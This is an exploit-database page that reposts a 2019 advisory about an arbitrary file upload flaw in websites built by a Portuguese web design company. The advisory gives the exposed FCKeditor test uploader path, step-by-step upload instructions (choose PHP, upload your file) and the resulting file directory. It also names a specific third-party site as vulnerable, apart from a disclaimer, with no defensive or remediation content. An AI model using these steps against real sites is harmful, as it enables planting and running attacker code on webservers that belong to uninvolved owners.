Advertisement






Ctecia ComputerTechnologies Experts Unauthorized File Insertion

CVE Category Price Severity
N/A CWE-264 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2019-05-21
CVSS EPSS EPSSP
CVSS:4.0/AV:A/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H 0.42153 0.9712

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019050233

Below is a copy:

Ctecia ComputerTechnologies Experts Unauthorized File Insertion
####################################################################

# Exploit Title : Ctecia ComputerTechnologies Experts Unauthorized File Insertion
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 21/05/2019
# Vendor Homepage : ctecia.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description About Software :
*****************************
Ctecia ComputerTechnologies Experts is Web Design Company in Portugal.

####################################################################

# Impact :
***********
Ctecia ComputerTechnologies Experts is prone to a vulnerability that lets attackers 
upload arbitrary files because it fails to adequately sanitize user-supplied input. 

An attacker can exploit this vulnerability to upload arbitrary code and execute
it in the context of the webserver process. This may facilitate unauthorized access 
or privilege escalation; other attacks are also possible.

####################################################################

# Arbitrary File Upload / Unauthorized File Insert Exploit :
**************************************************
/FCKeditor/editor/filemanager/upload/test.html

Select the "File Uploader" to use : Choose PHP and upload your file.

Directory File Path :
**********************
/FCKeditor_upload/[YOURFILENAME].txt .jpg .gif .png 

####################################################################

# Example Vulnerable Sites :
************************
[+] bmgtours.com/FCKeditor/editor/filemanager/upload/test.html

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum